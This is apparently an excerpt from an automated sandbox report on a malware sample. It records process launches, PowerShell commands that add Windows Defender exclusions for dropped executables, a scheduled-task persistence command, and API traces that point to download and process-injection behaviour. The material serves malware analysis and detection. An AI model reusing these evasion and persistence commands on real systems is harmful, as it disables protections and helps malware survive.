Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4i1jhsy0\4i1jhsy0.cmdline"
Imagebase:	0x13faf0000
File size:	2'758'280 bytes
MD5 hash:	23EE3D381CFE3B9F6229483E2CE2F9E1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	19:21:12
Start date:	20/11/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8B10.tmp" "c:\Users\user\AppData\Local\Temp\4i1jhsy0\CSC6DB7E53F49C54638AC449C3AA969DEC.TMP"
Imagebase:	0x13fbf0000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	19:21:16
Start date:	20/11/2024
Path:	C:\Users\user\AppData\Roaming\caspol.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\caspol.exe"
Imagebase:	0xff0000
File size:	600'576 bytes
MD5 hash:	74061922F1E78C237A66D12A15A18181
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	19:21:16
Start date:	20/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"
Imagebase:	0x1010000
File size:	427'008 bytes
MD5 hash:	EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: powershell.exePID: 1520, Parent PID: 956

General

Target ID:	40
Start time:	19:21:16
Start date:	20/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
Imagebase:	0x1010000
File size:	427'008 bytes
MD5 hash:	EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: schtasks.exePID: 2076, Parent PID: 956

General

Target ID:	43
Start time:	19:21:17
Start date:	20/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpF9BA.tmp"
Imagebase:	0x670000
File size:	179'712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	19:21:19
Start date:	20/11/2024
Path:	C:\Users\user\AppData\Roaming\caspol.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\caspol.exe"
Imagebase:	0xff0000
File size:	600'576 bytes
MD5 hash:	74061922F1E78C237A66D12A15A18181
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

VBA Code

Call Graph

Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Sheet1

Declaration

Line	Content
1	Attribute VB_Name = "Sheet1"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: Sheet2

Declaration

Line	Content
1	Attribute VB_Name = "Sheet2"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: Sheet3

Declaration

Line	Content
1	Attribute VB_Name = "Sheet3"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: ThisWorkbook

Declaration

Line	Content
1	Attribute VB_Name = "ThisWorkbook"
2	Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Reset < >

Analysis Process: mshta.exePID: 3644, Parent PID: 564COMMON

Executed Functions

Function 02BC0FB9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000003.429055614.0000000002BC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_2bc0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 79060d893f03ada0e86dcaa10fed5825071394f7184aca27c61aa44b973dad7e
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash:

Function 02BC0FB1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000003.429055614.0000000002BC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_2bc0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 79060d893f03ada0e86dcaa10fed5825071394f7184aca27c61aa44b973dad7e
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash:

Function 02BC0FA9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000003.429055614.0000000002BC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_2bc0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 79060d893f03ada0e86dcaa10fed5825071394f7184aca27c61aa44b973dad7e
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash:

Function 02BC0FC1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000003.429055614.0000000002BC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_2bc0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 79060d893f03ada0e86dcaa10fed5825071394f7184aca27c61aa44b973dad7e
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash:

Analysis Process: powershell.exePID: 3756, Parent PID: 3644COMMON

Execution Graph

Execution Coverage:	5.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	50%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 000007FE899C4B18 Relevance: 1.6, APIs: 1, Instructions: 129
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON ref: 000007FE899C5AF0

Memory Dump Source

Source File: 00000004.00000002.483973240.000007FE899C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7fe899c0000_powershell.jbxd

Similarity

API ID: DownloadFile
String ID:
API String ID: 1407266417-0
Opcode ID: bc1e25d99f84913bad74322f3ac666c3d897952af17246a1d5f0f6b5163ff090
Instruction ID: 25178accbefb6b5947c292b49dbc6ca39ba370ab567ea80bcba20f8be6195510
Opcode Fuzzy Hash: bc1e25d99f84913bad74322f3ac666c3d897952af17246a1d5f0f6b5163ff090
Instruction Fuzzy Hash: A131913191CA5C8FDB58EF5CD8857A9B7E0FB69315F00822ED04ED3661CB70A805CB81

Function 000007FE899C59E1 Relevance: 1.7, APIs: 1, Instructions: 159
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON ref: 000007FE899C5AF0

Memory Dump Source

Source File: 00000004.00000002.483973240.000007FE899C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7fe899c0000_powershell.jbxd

Similarity

API ID: DownloadFile
String ID:
API String ID: 1407266417-0
Opcode ID: ccb9fe2cd4fae603523fa431c269ce134e33e7ab976b7a01f9845c61326734f3
Instruction ID: 1cda7b2bf66bdeead6a1f70e8c58256512aeb59cc8b48756f7860ef4c6b78ef9
Opcode Fuzzy Hash: ccb9fe2cd4fae603523fa431c269ce134e33e7ab976b7a01f9845c61326734f3
Instruction Fuzzy Hash: 0441F57181DB889FDB19DB589C447A9BBF0FB66325F04826FD08DD3162CB246806C782

Function 000007FE89A926E9 Relevance: .7, Instructions: 731
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.484676524.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7fe89a90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ada3ea9d959bb99219eab11c2b2d3fde84c1614a9acb7a1c081904f772b383e
Instruction ID: 78cf024c6cd3eaec6d21916f849635ad47b1f865f16350d5df5317cb782e71c1
Opcode Fuzzy Hash: 8ada3ea9d959bb99219eab11c2b2d3fde84c1614a9acb7a1c081904f772b383e
Instruction Fuzzy Hash: 6D321630A0CB894FE759EB2C9454668BFE2FF5A344F2441EED48EC72A3DA24AC55C741

Function 000007FE89A90F0D Relevance: .4, Instructions: 381
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.484676524.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7fe89a90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da5aa8d56b308dc4181102aa7409a305c0226f1d2562ecf9311713d78811ecce
Instruction ID: 79bf113026945019aa85ac58ea707e9f4fca7b9aeb017b1b1f7dd04d2de0845e
Opcode Fuzzy Hash: da5aa8d56b308dc4181102aa7409a305c0226f1d2562ecf9311713d78811ecce
Instruction Fuzzy Hash: 71B1D321A0E7C90FE347973C58642647FE1EF47258B2A41EBD48ECB2B3D5199C5AC362

Analysis Process: caspol.exePID: 3064, Parent PID: 3756COMMON

Execution Graph

Execution Coverage:	14.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	169
Total number of Limit Nodes:	9

Executed Functions

Function 001C1047 Relevance: 19.6, Strings: 15, Instructions: 871
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

tm}t, xrefs: 001C1AC2
$p, xrefs: 001C15F9
&, xrefs: 001C17FE
9, xrefs: 001C1222
, xrefs: 001C13BC
_, xrefs: 001C1741
E, xrefs: 001C1846
C, xrefs: 001C131E
=, xrefs: 001C121B
&, xrefs: 001C18FE
x, xrefs: 001C1B47
E, xrefs: 001C1737
, xrefs: 001C12B9
j, xrefs: 001C1AEA
7, xrefs: 001C1A10

Memory Dump Source

Source File: 0000000B.00000002.474807577.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c0000_caspol.jbxd

Similarity

API ID:
String ID: $ $&$&$7$9$=$C$E$E$_$j$tm}t$x$$p
API String ID: 0-2304366549
Opcode ID: 766e2ed9bf4bc561f379b7699e0e069829dc9b1ee396bfba5f614434c340b7bd
Instruction ID: c7daf1e3c22f793f21571eaf2e4a96a67c05561eaa1702a0c4c38cc85b49e808
Opcode Fuzzy Hash: 766e2ed9bf4bc561f379b7699e0e069829dc9b1ee396bfba5f614434c340b7bd
Instruction Fuzzy Hash: 6C825830A00705CFC755EB74C854BADB7B2BFAA300F5186ADE449AB361DB74E986CB41

Function 001C04C0 Relevance: 19.6, Strings: 15, Instructions: 838
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

tm}t, xrefs: 001C1AC2
$p, xrefs: 001C15F9
&, xrefs: 001C17FE
9, xrefs: 001C1222
, xrefs: 001C13BC
_, xrefs: 001C1741
E, xrefs: 001C1846
C, xrefs: 001C131E
=, xrefs: 001C121B
&, xrefs: 001C18FE
x, xrefs: 001C1B47
E, xrefs: 001C1737
, xrefs: 001C12B9
j, xrefs: 001C1AEA
7, xrefs: 001C1A10

Memory Dump Source

Source File: 0000000B.00000002.474807577.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c0000_caspol.jbxd

Similarity

API ID:
String ID: $ $&$&$7$9$=$C$E$E$_$j$tm}t$x$$p
API String ID: 0-2304366549
Opcode ID: 09c3570765d609b5fd8cd6b540670c7328cb93c3266e8a6477db21ee49d700e8
Instruction ID: caf66e5ffeb302e07b562f63c3c19f238ce4083050ca1221b86ca37c9b763572
Opcode Fuzzy Hash: 09c3570765d609b5fd8cd6b540670c7328cb93c3266e8a6477db21ee49d700e8
Instruction Fuzzy Hash: 7D825930A00705CFC755EB74C854BAEB7B2BFAA300F5186ADE449AB361DB74A985CF41

Function 001C108F Relevance: 19.6, Strings: 15, Instructions: 830
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

tm}t, xrefs: 001C1AC2
$p, xrefs: 001C15F9
&, xrefs: 001C17FE
9, xrefs: 001C1222
, xrefs: 001C13BC
_, xrefs: 001C1741
E, xrefs: 001C1846
C, xrefs: 001C131E
=, xrefs: 001C121B
&, xrefs: 001C18FE
x, xrefs: 001C1B47
E, xrefs: 001C1737
, xrefs: 001C12B9
j, xrefs: 001C1AEA
7, xrefs: 001C1A10

Memory Dump Source

Source File: 0000000B.00000002.474807577.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c0000_caspol.jbxd

Similarity

API ID:
String ID: $ $&$&$7$9$=$C$E$E$_$j$tm}t$x$$p
API String ID: 0-2304366549
Opcode ID: 49e916c75123f620854566e9ae19bd624e84348b0f600f9e24a07f130b2a8279
Instruction ID: 82362109d3646d00fc3b5df4492043a64c170b2efd2ddf2b4e09bc9cf1808a8b
Opcode Fuzzy Hash: 49e916c75123f620854566e9ae19bd624e84348b0f600f9e24a07f130b2a8279
Instruction Fuzzy Hash: B0824830A00705CFC755EB74C854BAEB7B2BFAA300F5186ADE449AB361DB71A985CF41

Function 001C2808 Relevance: 5.6, Strings: 4, Instructions: 562
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:, xrefs: 001C2A87
4'p, xrefs: 001C2BC4
~, xrefs: 001C2A26
pp, xrefs: 001C2C8D

Memory Dump Source

Source File: 0000000B.00000002.474807577.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c0000_caspol.jbxd

Similarity

API ID:
String ID: 4'p$:$pp$~
API String ID: 0-1820105848
Opcode ID: d428a42b05f7b390cdfcfdc2ef3dfd825a54fec6f3d8cb8aaeaa7296f3a23ba4
Instruction ID: b618cbe5111c72367215d6a242162f3c3c97374f716ddfa17a8e44810ef96c59
Opcode Fuzzy Hash: d428a42b05f7b390cdfcfdc2ef3dfd825a54fec6f3d8cb8aaeaa7296f3a23ba4
Instruction Fuzzy Hash: 1242B075A00228DFDB29CFA9C980F99BBB2BF59304F1580E9E509AB261D731DD91DF10

Function 001CBD40 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.474807577.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c0000_caspol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb1223fd18c3c1b859ca1177b2c4378df04b06f216a161e8f19e34eba7eb7dc5
Instruction ID: 7d681981c9d0f0406eaa0f9480133458a964a4696befe64aaba6ce6051b44d3a
Opcode Fuzzy Hash: eb1223fd18c3c1b859ca1177b2c4378df04b06f216a161e8f19e34eba7eb7dc5
Instruction Fuzzy Hash: CCE1FA74E042598FCB14DFA9C590AADFBB2FF89304F248169D919A7356D730AD42CFA0

Function 001CE2C5 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 327
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001CE597

Strings

gE, xrefs: 001CE6DF
gE, xrefs: 001CE61A
gE, xrefs: 001CE4EA

Memory Dump Source

Source File: 0000000B.00000002.474807577.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c0000_caspol.jbxd

Similarity

API ID: CreateProcess
String ID: gE$gE$gE
API String ID: 963392458-3850529454
Opcode ID: 627e0b198ec979b9e01807e3872df52de2fc1403597b624d2290ffd2b73f960b
Instruction ID: 4a12914081cbb553a392ec321b51356e260c663249e4ba461018a0fce1efe2f4
Opcode Fuzzy Hash: 627e0b198ec979b9e01807e3872df52de2fc1403597b624d2290ffd2b73f960b
Instruction Fuzzy Hash: 27C11571D002598FDF24CFA8C845BEEBBF1BB19304F0095AAD819B7250DB749A85CF95

Function 001CE2D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 323
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001CE597

Strings

gE, xrefs: 001CE6DF
gE, xrefs: 001CE61A
gE, xrefs: 001CE4EA

Memory Dump Source

Source File: 0000000B.00000002.474807577.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c0000_caspol.jbxd

Similarity

API ID: CreateProcess
String ID: gE$gE$gE
API String ID: 963392458-3850529454
Opcode ID: 051c6d7a79b1ee3bc1f3010e3fa90dd493313e1bcbd6cbdb6c77a73e9cb6bfd3
Instruction ID: a52afd6fdcf813ab5a3d0fa2f70173d5f09ad651c275b7fab577a00df0ae5e5d
Opcode Fuzzy Hash: 051c6d7a79b1ee3bc1f3010e3fa90dd493313e1bcbd6cbdb6c77a73e9cb6bfd3
Instruction Fuzzy Hash: F1C11471D002698FDF24CFA8C845BEEBBF1BB19304F0095AAD819B7250DB749A85CF95

Function 007010A6 Relevance: 3.9, Strings: 3, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$p, xrefs: 007012A3
$p, xrefs: 00701293
4,p, xrefs: 00701244

Memory Dump Source

Source File: 0000000B.00000002.476910871.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_700000_caspol.jbxd

Similarity

API ID:
String ID: 4,p$$p$$p
API String ID: 0-3634262024
Opcode ID: c41791c036d7b17a509922854158e9f9b48ec8239fb43fd6173ae9913485934b
Instruction ID: f4b0143e517759aa5a1cf0a70c17acb0f3d4e752753b2b78ae40824b6d04f31a
Opcode Fuzzy Hash: c41791c036d7b17a509922854158e9f9b48ec8239fb43fd6173ae9913485934b
Instruction Fuzzy Hash: 51412470E04208DFDB08DFA8D9547EEBBF2BB89300F60822AD015AB296DB785941CF44

Function 001CDF38 Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001CE00B

Memory Dump Source

Source File: 0000000B.00000002.474807577.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c0000_caspol.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: f6554089bc1041972988da93478c8499a298672be161a2442db4bef7d65e0245
Instruction ID: 1d0419012736d15f639dea22e12746d44300439138401fd4d1285eea5afb6f6b
Opcode Fuzzy Hash: f6554089bc1041972988da93478c8499a298672be161a2442db4bef7d65e0245
Instruction Fuzzy Hash: D341AAB4D002489FCF00CFA9D984AEEFBF1BB49314F20942AE814B7210D375AA55CF64

Function 001CDF30 Relevance: 1.6, APIs: 1, Instructions: 117
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001CE00B

Memory Dump Source

Source File: 0000000B.00000002.474807577.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c0000_caspol.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: b27a8621024603c51c41b35055bbd363e8ab45ed45b0074101ebcc1518dae489
Instruction ID: ea3e91d6ed91f93f9deeeb21371e420d6f03a97e3cae2b695212b0c6d10a8ce0
Opcode Fuzzy Hash: b27a8621024603c51c41b35055bbd363e8ab45ed45b0074101ebcc1518dae489
Instruction Fuzzy Hash: E741ABB4D002489FCF00CFA9D984AEEFBF1BB49314F20942AE819B7250D374AA55CF64

Function 001CE090 Relevance: 1.6, APIs: 1, Instructions: 112
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001CE14A

Memory Dump Source

Source File: 0000000B.00000002.474807577.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c0000_caspol.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 26daa8b8faaf3837cc27d67cbdeae5d2ba855ea482dacf95d8c4cab169361305
Instruction ID: e2fffad4004a9871b66e409e94826cbc5b412af53ceb60b7ec970dd187727a26
Opcode Fuzzy Hash: 26daa8b8faaf3837cc27d67cbdeae5d2ba855ea482dacf95d8c4cab169361305
Instruction Fuzzy Hash: 5041C9B8D042589FCF10CFA9D984AEEFBB1BF49314F24942AE815B7210C374A946CF64

Function 001CE098 Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001CE14A

Memory Dump Source

Source File: 0000000B.00000002.474807577.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c0000_caspol.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 3276483a37497173ef4cdc518f85df50461c62da3565b954ae2dd37fcc154f5d
Instruction ID: 94df1416a0d7ad10607f5fea4527a17a768f01d1739489028a17053b1324323f
Opcode Fuzzy Hash: 3276483a37497173ef4cdc518f85df50461c62da3565b954ae2dd37fcc154f5d
Instruction Fuzzy Hash: 2D41A8B9D002589FCF10CFAAD984AEEFBB1BF49314F24942AE814B7200D775A955CF64

Function 001CDE09 Relevance: 1.6, APIs: 1, Instructions: 104
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001CDEBA

Memory Dump Source

Source File: 0000000B.00000002.474807577.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c0000_caspol.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1b41d12b653527fa6f695a1add32ec31e65c590a789b7f788c60642dc5e3f0e7
Instruction ID: 58732f998f53fcb9b80fb78f691fd9ba77cc0ddb54873bcdca72856d5f10a32f
Opcode Fuzzy Hash: 1b41d12b653527fa6f695a1add32ec31e65c590a789b7f788c60642dc5e3f0e7
Instruction Fuzzy Hash: D841AAB8D002489FCF10CFA9D980AEEFBB1BF59314F10942AE815BB214D735A946CF65

Function 001CDE10 Relevance: 1.6, APIs: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001CDEBA

Memory Dump Source

Source File: 0000000B.00000002.474807577.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c0000_caspol.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f9cc7a907e1276367d8fa044a0e1314a56577d6e3cec0449ea245c278130af89
Instruction ID: 493fd04b156b5f9fb6139ec31d7eabcdcfe7770cffdf3cbd94b3a5adb884d258
Opcode Fuzzy Hash: f9cc7a907e1276367d8fa044a0e1314a56577d6e3cec0449ea245c278130af89
Instruction Fuzzy Hash: 6141ABB8D002489FCF10CFA9D980AEEFBB1BB59314F10942AE815B7300D735A905CFA5

Function 001CD8A0 Relevance: 1.6, APIs: 1, Instructions: 97
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 001CD957

Memory Dump Source

Source File: 0000000B.00000002.474807577.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c0000_caspol.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c96154975e5323b3f050d42bfbdd3726b5513785b2dd4d6a8cb3dfcae81657fa
Instruction ID: 8a9069d3594cf99d628b734c35da042f63cd1b7d373e41a7b350862ade295a3e
Opcode Fuzzy Hash: c96154975e5323b3f050d42bfbdd3726b5513785b2dd4d6a8cb3dfcae81657fa
Instruction Fuzzy Hash: 2541ADB5D002589FCF10CFA9D984AEEFBB1BF49314F24842AE419B7244D7789949CF54

Function 001CD8A8 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 001CD957

Memory Dump Source

Source File: 0000000B.00000002.474807577.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c0000_caspol.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 7faf83536db0e7ec2aba1b3dfc4328961bbcf129eac9647a2c1a64fa5bae9763
Instruction ID: 3414674eba4708b0496417d6f9aa8e63dcbb65e632c8b5d1d783c677e931c514
Opcode Fuzzy Hash: 7faf83536db0e7ec2aba1b3dfc4328961bbcf129eac9647a2c1a64fa5bae9763
Instruction Fuzzy Hash: C041ACB5D002589FCF10CFA9D984AEEFBB1AB49314F24842AE419B7244D778A945CF54

Function 001CD7B1 Relevance: 1.6, APIs: 1, Instructions: 78threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 001CD836

Memory Dump Source

Source File: 0000000B.00000002.474807577.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1c0000_caspol.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 184d6bbf48b1294abe0a4eb0076a0715378aed3fba249288e72bcffb0df21278
Instruction ID: 87877c84e8a50c005195023c9aa9d522abaa43c167b55597201b78f9032b98ae
